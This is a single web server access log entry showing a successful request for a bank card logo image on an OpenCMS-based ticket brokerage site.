47.128.110.12 - - [29/Jun/2024:02:29:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
